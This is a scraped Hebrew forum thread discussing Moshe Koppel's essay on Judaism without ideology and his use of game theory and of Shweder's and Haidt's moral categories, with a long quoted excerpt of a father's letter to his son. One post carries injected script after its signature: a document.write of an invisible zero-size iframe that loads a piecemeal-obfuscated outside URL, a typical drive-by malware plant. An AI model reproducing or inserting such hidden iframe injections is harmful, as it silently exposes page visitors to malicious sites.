באמת.
האויבת הגדולה של מתח יצירתי זה היא האידאולוגיה. אידאולוגים מה'ימין' חוששיםמנזילותה של התורה שבעל–פה (או שהם אטומים כלפיה) והם מצמצמים אותה לתורהשבכתב. מהלך כזה מצמצם מסורת חיה לכלל אידאולוגיה. אידאולוגים מה'שמאל'
חוששים מהלכה לא אופנתית והם מעגלים פינות כדי שתהיה ערבה יותר. גם הם
מצמצמים מסורת חיה לכלל אידאולוגיה.
עליך להכיר את הרטוריקה של האידאולוגיה כיוון שהיא מקיפה אותך ופועלת בחשאילעקור אותך ממורשתך. סוג אחד שגור על פיהם של אלה שיאמרו לך שהאמת קיימתרק בדרך אחת. מה שלא תהיה אותה הדרך, זו לא תהיה הדרך שלך. כל טענה שהיהודיםתמיד טעו בעניין כלשהו פשוט איננה קוהרנטית מיניה וביה. אם אחד מרבותיך יאמרלך שמנהג בן מאות שנים מוטעה משום שכך כתוב בספר הלכתי זה או אחר, הוא לארק טועה אלא גם מסוכן. אם הוא מנסה ללמד אותך תחום חדש ומוזר המכונה 'אמונה'
או 'השקפה', הוא מן הסתם עושה נפשות לאיזושהי אידאולוגיה מפוקפקת שנולדה זהלא מכבר, בדרך כלל ציונות קיצונית או אנטי–ציונות קיצונית. שמור מרחק. אם אתהחש צורך ללמוד מחשבה, עיין בשפת אמת בליל שבת. זכור שהגמרא לא הומצאהבבריסק, שהרב קוק לא גילה את ארץ ישראל, ושהחסידות אינה נחלתה הבלעדית של
חב"ד.
58
סוג אחר של רטוריקה אידאולוגית מסוכנת שגורה על פיהם של אלה שיזכירו לך ש"ישהרבה דרכי אמת ביהדות". דבר זה נכון אבל קרוב לוודאי שהם אינם הולכים באף אחתמהן. פתיחותם למראית עין מחפה לרוב על שכנוע עמוק ויהיר שהיהדות שאנו מכיריםפרימיטיבית, חשוכה, ופרובינציאלית וזקוקה נואשות להשפעתו המאירה של שיגיוןאינטלקטואלי שאופנתי כרגע באוניברסיטאות (והם ינסו לשכנע אותך שדווקא זה מהשהיהדות נועדה להיות מלכתחילה). בבחירה בין המבינים את היהדות אך נטו ממנה,
או אפילו ברחו, לבין המסלפים אותה, העדף תמיד את חברתם של הראשונים. בסופו
של דבר, מה שמשנה הוא מיקומו של העוגן.
יראת שמים אינה מתיישבת היטב עם אידאולוגיה ועם מי שצדיק בעיני עצמו. יראתשמים מצויה הרבה יותר בקרב אלה החיים בענוותנות בלי כל יומרות ושיש להם חושהומור. ענוותנות שכזאת מושרשת בידיעה שלאיש מאתנו אין קו ישיר לריבונו שלעולם ושהאמת והצדק הטהורים אינם מונחים בכיסנו. בסופו של דבר, גרסת היהדותהלא–שרירותית ביותר שיש לבן–אדם היא אותה גרסה שהיא, לכל הפחות, שלו עצמו.
בעבורך, מדובר בגרסה של חסידות פולין, בתוספת השפעות לכאן ולכאן בעקבותהחוויה האמריקאית והחוויה הישראלית; בעבור אחרים ייתכן שמדובר בדבר אחרלחלוטין. יש בעלי מסורת מחמירה יותר ויש שיפשפשו באילן היוחסין כמה וכמהדורות אחורה כדי למצוא גרסה אותנטית מספיק של היהדות כדי שיוכלו להזדהותעמה. אחרים ימצאו אותה כשיצטרפו לקהילה מתאימה. כל אדם מושך מעט אתהיהדות שהונחלה לו בכיוון שאליו מורה שורש נשמתו. אך אם ינסה להשביחה בעזרתתאוריה זו או אחרת יאבד את אותה הסגולה שמבטיחה ליהדות את נצחיותה — סגולת
היותה מסורה חיה ורציפה.
המתח שמוטבע בהוויה כחלק ממסורת חיה היה נהיר ומוחשי ליהודים כמו סביךוהורי–סביך מזה אלפי שנים. אני רוצה שגם אתה תחוש את המתח הזה. אך לא תצליחלקנות אותו לעצמך אלא אם כן תשקיע פרק זמן משמעותי ביהדות אינסטינקטיבית.
היום, למרבה הצער, הדבר נעשה קשה ביותר. אינני מעונין לשרטט תמונה רומנטיתשל עבר אגדי תמים, אך בימינו העוצמה והמכלול של החוויה היהודית שהיתה בעברנמוגה כמעט מכמה וכמה סיבות חמורות. נחשפת מוקדם מדי ליותר מדי תרבות זרה— כבר עכשיו קיימת סכנה שיהדות תהפוך לעוד בררת חיים שצריכה להישקל. העוגןאיננו כבד דיו והשרשראות אינן ארוכות דיין. אני חרד שאם תמשוך חזק מדי הן
תינתקנה.
מה תוכל לעשות כדי לתפוס את מקומך במצעד הדורות המפואר של מסורת היהדות?
אינני יכול שלא לומר זאת, קיים מצוות והיה נכון להקרבה בעבור עם ישראל. אבלאתה כבר רציני ודקדקן ובעוד שנים מעטות תהיה, בעזרת ה', חייל מסור. אז הרשה לי
להזכיר לך כמה דברים שפחות ברורים מאליהם.
קודם כל, שים לב לכל הפרטים הקטנים שנראים לך חסרי חשיבות (כפי שנראו ליכשהייתי בגילך): הניגונים, המבטאים, ה'וורטלעך', הבדיחות, ומיליון דברים אחרים.
יהדות ללא אידאולוגיה
59
לעתים דברים טריוויאליים–כביכול טומנים בחובם את המסרים העמוקים ביותר.
התייחס אליהם ברצינות ואולי, ביום מן הימים, הם יגלו את צפונותיהם (ואם חלק
ייעזבו בצד הדרך, אל תתייאש — זו דרך העולם).
בנוסף, למד הרבה גמרא. לימוד גמרא רציני הכרחי לכל גרסה אותנטית של יהדות:
השילוב, שכה מרכזי ביהדות, של דבקות בפרטי המסורת יחד עם עיון ביקורתי מדוקדקבאותם פרטים נובע במידה מרובה משקיעה בלימוד גמרא. לא קל למצוא לו תחליף.
אם לא תלמד גמרא באינטנסיביות, תמנע מעצמך את ענף לימוד התורה שהיה מוקדלמרצם האינטלקטואלי של אבותיך מדורי–דורות. אם תלמד גמרא בצורה שטחית,
תיעשה צר וקטנוני. ואולם אם תשקע בלימוד אינטנסיבי ועמוק, תפתֵח ענוותנות כלפיהישגיהם האדירים של דורות חכמים — בתקווה שתמצא את מקומך עמם — ותדע
מתי ללכת אחר הרהורי לבך ומתי לסור מהם.
לאחר שתהיה מעוגן היטב במורשת המונחלת לך, הכוללת ידע נרחב ומעמיק בש"ס,
תוכל לשוט ולמתוח את שרשראותיך ככל שיניחו לך. העולם גדוש פלאים — טובים,
רעים ומכוערים. סייר כמה שלבך חפץ וכמה שמחויבויותיך מאפשרות. למד להכיר
אותם מקרוב כבן–בית ומתוך פרישות כזר.
ולבסוף, המשך להיות מבקר עיקש ופיקח של תבונה מונחלת בדיוק כשם שהיו אבותיך,
אך תמיד הקפד לעשות זאת מתוך כבוד לאותם אבות ולא מתוך זלזול בהם.
בסופו של דבר, על אף פרצי הציניות המזדמנים שלי, המסר שברצוני להותיר לך נדושלגמרי והרי הוא לפניך: לעולם זכור שאמא ואני מעבירים לידיך גחלת לוחשת קטנהשקיבלנו מהורינו כפי שהם קיבלו אותה מהוריהם. אם תתעלם ממנה, אם תעמעםאותה, אם תשתטה איתה, היא תכבה. אך אם תשב לצדה ותטפח אותה בזהירות, אםתדע מתי להגן עליה בקנאות ומתי לתת לה אוויר, אם לעתים תתהלך בחורשה הקרובהותלקט עצים חסונים להסיקה — אזי גחלת קטנה זו לא רק תחמם ותאיר את לילות
החורף האפלים, אלא תהיה המורשת שתנחיל לילדיך כפי שהם ינחילוה לילדיהם.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 10:55 לינק ישיר 

מיימוני כתב:

לקחים היסטוריים: כמה טוב להיות יהודי שומר מצוות!

היהדות של שימען תמשיך לשרוד.

אבנים שורדות יותר טוב מבני-אדם.

נראה שהכותב מעדיף את השרידות של היהדות - הפולחן היהודי.
מאשר את טובת האדם היהודי.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 10:40 לינק ישיר 

מיימוני
קראתי את המאמר, הוא כתוב בצורה יפה מאוד פרט לתוכן.

אי"ה אשוב לטענותיך, רש שמישהו יסביר לי מה רע מצאה אמבר בירקות ממשפחת הסולניים.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 01:36 לינק ישיר 

לקחים היסטוריים: כמה טוב להיות יהודי שומר מצוות!

בהסתמך על שני ניתוחים אלו, מתחום האנתרופולוגיה של הערכים וסיווגם ומתוך הכלכלה של תורת המשחקים, מציע קופל את משלוש הטענות הבאות:

א.     החברה היהודית החסידית נוסח שימען מגלמת את הערכים בצורה הבריאה והשרדנית ביותר. (זאת בניגוד כמובן להתנהגות ולערכים של היידי ואמבר)

ב.     החברה היהודית בכל דורותיה וגילומיה התרבותיים הצליחה לגלם את הערכים והתועליות ההישרדויות האלו.

ג.      זו גם הסיבה האמיתית לאנטישמיות. כלומר הקנאה של חברות ותרבויות אחרות. (קופל עד כמה שהבנתי אינו מספק הסבר איך מזהים הגויים את התכונה היהודית הזו ולמה שיצאו נגדה. אולי זה מנגנון אבולוציוני של אני והחברה שלי או אתה והחברה שלך, אז אני צריך למחוק אותך?)

ועוד משהו, רביעי: התרבות של היידי והניוון התרבותי של אמבר גוזרים כליה על עצמם. היהדות של שימען תמשיך לשרוד. זאת מסיבות שניתן להבין על פי תורת המשחקים, פסיכולוגיה כלכלית וכלכלה אבולוציונית, ושאר תחומי מחקר (כמו סוציולוגיה ואנתרופולוגיה) כפי שמיישם אותם קופל. שוב, אני מפנה למאמר שלו שמסביר זאת יפה ומעניין וברור. (זה כמובן לא אומר שאני מסכים לדבריו. הם נכונים אבל לדעתי חלקיים).

כיון שקופל הוא יהודי מהסוג של שימען, יש לו ודאי אינטרס ושמחה להגיע למסקנות האלו. למה אני איני מתלהב כמוהו? שאלה טובה. אולי בגלל שאני חשדן וספקן או איפכא מסתברא כזה? או בגלל שבאמת יש להסתפק אם הניתוח שלו נכון?

טענה ב היא מתחום ההיסטוריה, והיא טעונה בדיקה והוכחה. אולי זה מה שעושה קופל בספר שלו שטרם התפרסם ורק חלקו האחד לפנינו.

טענה ג היא לא רק היסטורית אלא גם, חוששני, פסיכולוגית מהסוג הפרוידיאני, כלומר כזו שבה החוקר יודע יותר טוב מהאנשים והחברות שהוא חוקר מה מניע אותם.

אפילו לגבי סעיף א אפשר להעיר משהו. יתכן מאד שהחברה או התרבות או האופן שבו שימען וחבריו מפרשים את היהדות הוא בריא. אני מפנה לחוקר נוסף שגם הוא השתמש בכלים סוציולוגיים כדי להסביר מדוע היהדות החסידית כל כך טובה ובריאה. היה זה רוטנברג בטענתו שהיהדות (הזו) הציעה נראטיב של "אני בסדר אתה בסדר" או חברה רב תגית (שבה יש אופנים שונים של הצטיינות ו"בסדריות") ואפילו מצא את הרעיון הזה במיתוס של הארי על הצמצום (בניגוד למיתוס הפרויידיאני על התסביך האדיפאלי וכבר הארכתי יותר מדי).

מה מפריע לי? אולי דבר קטן. כמיימוניסט וכפילוסוף ואפילו כאדם חסר אהדה וחיבה לטכסים של היהדות הזו שקופל כל כך אוהב, אני מרשה לעצמי לקוות שניתן לבנות דגמים טובים יותר, שיש דגמים טובים יותר, על פי הקריטריונים של הצטיינות הישרדותית שמשרטט קופל.

זה הבדל ביני לבינו. הוא שמרן, כלומר סבור שמה ששרד והועיל הוכיח את עצמו. אני רדיקל, כלומר מאמין בביקורת ובניה מחדש כתהליך בריא ואפילו חיוני. (תודה לחברנו הותיק רדף השיג על התובנות האלו שהושגו בתכתובת משותפת).

עם כל החשדות והספקות שלי לגבי המסקנות המרחיקות לכת, ודאי שיש כאן מאמר מרתק וחכם, שאפשר ללמוד ממנו הרבה. את מה שלמדתי סיכמתי כאן. ואידך (השאר) – לכו תקראו, תלמדו ותחשבו.

____אוי, טעות הקלדה! תוקן_____________

שומר פיו ולשונו - שומר מצרות נפשו < type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");

תוקן על ידי מיימוני ב- 22/02/2018 01:44:13

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 01:35 לינק ישיר 

רעיונות של תורת המשחקים

רגע, אני צריך בעצם להוסיף כאן מה שיכתוב קופל בהמשך. לקחים מתורת המשחקים על ההתנהגות האנושית.

דילמת האסיר מציגה את השאלה הפשטנית מה כדאי ומה יעשו שני בני אדם שכל אחד מהם יכול לרמות ולהרויח או להיות ישר ולהסתכן. תסלחו לי אם לא אתאר אותה. היא בוודאי מוכרת ואם לא, לכו תקראו את קופל (או בויקי).

הנקודה של קופל היא שדילמת האסיר היא אירוע חד פעמי. כדי להבין איך אנשים מתנהגים צריך להביא בחשבון שהחיים מציגים דילמות כאלו כל הזמן.

בואו נתייחס לחברה קפיטליסטית שבה אנשים עושים עסקים כל הזמן. (זה נכון כנראה גם לחברות אחרות אבל אני רחוק מן הידיעות הכלכליות של קופל). בחברה כזו, הרמאות משתלמת רק אם הזוג של הרמאי והמרומה לא ייפגשו עוד. לעומת זה, ככל שיש יותר מפגשים כך יותר כדאי להיות ישר.

קופל מצביע על כמה מאפיינים חשובים למי שרוצה להצליח ורוצה להיות ישר. עליו לא רק להיות ישר אלא גם לדעת לזהות אחרים כמוהו, ועליו לדעת להראות את הסימנים שמזהים אותו כאדם ישר ואמין לאורך זמן.

אחד הסימנים לאמינות הוא המוכנות להשקיע בסממנים ובהתנהגויות שעולות לי, האדם שרוצה ברושם הזה, במחיר יקר דיו כדי שלא ארצה להציג לחינם או לשם הרמאות.

למשל, ללכת בשטריימל כדי להראות בן לחברה החסידית. כדי שאוכל להיכנס לשטיבל ולאכול בקידוש כל פעם בלי שיגרשו אותי, כי יזהו אותי בתור בן הקבוצה.

דדווח על תוכן פוגעני

נשלח ב-22/2/2018 01:35 לינק ישיר 

כלי ניתוח סוציולוגיים עבור הטיפוסים

(לדעתי, החלק המרתק והחשוב ביותר במאמר)

(הגדרתי את הכלים האלו כסוציולוגיים. קופל מציג אותם כאנתרופולוגיים. ההבדל באמת לא מספיק ברור לי. מכאן ואילך אשתדל להשתמש במינוח שלו).

נתחיל עם ריצ'רד שוודר. על סמך ראיונות בהודו ובארהב, הציע שוודר למיין את הערכים האנושיים לשלוש קבוצות שונות. הקטע הבא כל כך חשוב וכל כך מוצלח עד שאני מעתיק אותו כפי שהוא. ואם יש חלק במאמר שכדאי לקרוא, זה החלק הזה והפרקים שאחריו. לדעתי כמובן.

1. האתיקה של האוטונומיה : הפרת זכויות. במבנה הזה, מעשה נחשב פסול אם הוא פוגע ישירות באדם אחר או מפר את זכויות הפרט או את חירויות הפרט שלו. כדי לקבוע אם פעולה היא פסולה, חושבים על דברים כגון פגיעה, זכויות, צדק, חופש, הוגנות, אינדיבידואליזם, וחשיבות החבירה והחירות של הפרט.
  2. האתיקה של הקהילה : הפרת ההיררכיה. כאן, מעשה נחשב פסול אם אדם אינו מבצע את חובתו כלפי הקהילה או ההיררכיה החברתית שלה. כדי לקבוע אם פעולה היא פסולה, חושבים על דברים כגון חובה, מחויבות מתוקף תפקיד, כבוד לסמכות, נאמנות, כבודה של הקבוצה, תלות הדדית ושימור הקהילה.
  3. האתיקה של האלוהות : הפרת הטהרה. כאן, הפרה היא מעשה של חוסר כבוד לאל או חילול קדושתו, או גרימת טומאה או ביזיון לעצמי או לזולת. כדי לקבוע אם פעולה פסולה, חושבים על דברים כגון חטא, הסדר הטבעי של הדברים, קדושה, וההגנה על הנשמה או על העולם מפני פריצות וטומאה רוחנית.

שלוש מערכות אלה תואמות שלושה סוגים של מצוות בתורה, שאת שמותיהן רבים מכירים משאלת הבן החכם בהגדה של פסח (על פי דברים ו', כ): עדוֹת, חוקים ומשפטים.

עד כאן דברי פרופסור משה קופל.

ובעצם, עוד קטע. שוב, יהיה קשה מאד לשפר את הניסוח שלו, ההסבר שלו.

המשפטים מארגנים את החברה באמצעות אסדרת חובותיו של כל פרט לאחרים. הם תואמים אפוא לאתיקת האוטונומיה. העדוֹת הן האמצעים למילוי חובתו של עם ישראל להעיד על ריבונות ה' בעולם, ובכלל זה לחלוק כבוד מיוחד לאנשים, לחפצים ולמוסדות המייצגים את החובה הזו. העדות תואמות אפוא את אתיקת הקהילה. החוקים הם המצוות הנראות שרירותיות אך מאותתות על ציות לאלוהים. הם משקפים אפוא את אתיקת האלוהות. בעולמו של שימען, "המשפטים" מוכרים גם כענייני צדק וחסד, העדוֹת ככבוד ויראה, והחוקים כקדושה וטהרה. לשם הפשטות ולמען האוניברסליות של המינוח, אתייחס מעתה לקטגוריות המוסריות הללו במונחים הוגנות, נאמנות ואיפוק, ולהפרתן אקרא בהתאמה פגיעה, זלזול וחילול. מעניין לראות ששלוש העבירות שעליהן אנו מצווים לפי חז"ל "ייהרג ואל יעבור" – שפיכות דמים, עבודה זרה וגילוי עריות  – הן פשוט מקרי הקצה של כל אחד מסוגי ההפרות שמנינו.

האם ניתן לבחון את הערכים האלו? ובכן, אפשר גם תיאורטית. זה מה שעשה תלמידו של שוודר, ג'ונתן היינדט. הוא הציג דילמות מוסריות, מהסוג שאפשר להשתעשע בהן אבל הן מגלות, גם לעצמנו, על ההעדפות שלנו ועל ההנמקות התיאורטיות, כלומר על מערכות הערכים שלנו. מתברר שגם אם ההערכות דומות בכל החברות: יש מעשים פסולים וזהו – ההנמקה שונה. וזה החלק המעניין שגם מבדיל בין חברות וגישות וערכים.

אני מעתיק שוב את קופל, וכבר כתבתי שקשה לשפר אותו והחלק הזה במאמרו ראוי מאד לקריאה. למה לכם לקרוא כאן, לכו קודם לשם.

סיפורים על גניבת תרופה שאדם זקוק לה נואשות, על גילוי עריות בהסכמה, על אכילת חיית המחמד המשפחתית, על ניגוב רצפה בדגל הלאומי… הבנתם את הקטע.

ובכן, בחברות שבדקו החוקרים האלו היתה הסכמה מקיר לקיר שהדברים האלו אינם ראויים. (הם לא שאלו יוצאי דופן כנראה. המטרה היתה לא רק לגלות את הגישה הגורפת אלא את ההנמקות שלה, שהן באמת שונות באופן מאלף).

מה התברר? שוב קופל.

מסקנתו המרכזית של היידט הייתה כי יש בעולם שני סוגי אנשים. בנים לקהילות מסורתיות נוטים לייחס חשיבות שווה, פחות או יותר, לכל אחת מהמערכות המוסריות (היידט חילק את המערכות של שוודר חלוקה נוספת, מדויקת יותר, לחמש או שש מערכות, אך הדבר אינו חשוב לענייננו). לעומתם, מערביים משכילים בעלי השקפות פוליטיות פרוגרסיביות נוטים לייחס חשיבות גדולה מאוד למערכת הראשונה, ההוגנות, וחשיבות מוגבלת ביותר לשתיים האחרות, נאמנות ואיפוק.

ופעם אחרונה קופל כדי להדגים איך זה עובד.

כמובן, גם הם אינם אוהבים את המחשבה על משפחה היושבת לארוחת הערב ואוכלת את בשרו של כלב הצ'יוואווה הביתי שמת לאחרונה. אבל נשאליו של היידט שהגדירו עצמם פרוגרסיבים החשיבו מעשה זה להפרה של מוסכמה חברתית ("אנחנו לא עושים דברים כאלה, אבל כל עוד אף אחד לא נפגע, מה שאנשים אוכלים הוא עניינם"), ואילו אלה שהגדירו עצמם שמרנים ראו באכילה כזו הפרה של המוסר המבזה את בני האדם גם אם לא נגרם נזק לאיש. אותו שוני התקיים בקרב נבדקיו של היידט גם בעמדות כלפי סיפורים אחרים הנוגעים להפרות לא מזיקות של טאבואים הנוגעים לכבוד כלפי ההיררכיה ולסמלים מקודשים.

סיכום נגד אמלק: בחברות שונות התגלה יחס שולל דומה כלפי מעשים שיש מהם סלידה טבעית (כנראה טבעית אבל אל תתפסו אותי במילה). ההנמקות שונות בין שני סוגי חברות, אנשים ותרבויות. הפסילה של מעשים מסויימים יכולה לנבוע מקריטריונים של האתיקה של האוטונומיה (פילוסופיה, מתקדם ומודרני, חירות האדם מעל לכל וזכותו לא להיפגע) או מקריטריונים של השתלבות קהילתית (שנראית בעלת ערך לכשעצמה) או מקריטריונים של דת (נגד הטהרה והאיסור).

עכשו – בואו ונחיל, עם קופל, את האבחנות האלו על ספרי ההלכה שלנו, כמו השולחן ערוך, ועל שלושת הטיפוסים היהודיים המודרניים, שימען, היידי ובתה אמבר.

דדווח על תוכן פוגעני

בית > פורומים > דת ואמונה > עצור כאן חושבים > ייחודה של הדת היהודית לפי משה קופל
מנהל לחץ כאן לנעילת האשכול
הוסף לעמוד האישי  דווח למנהל שלח לחבר
1 2 לדף הבא סך הכל 2 דפים.

bholext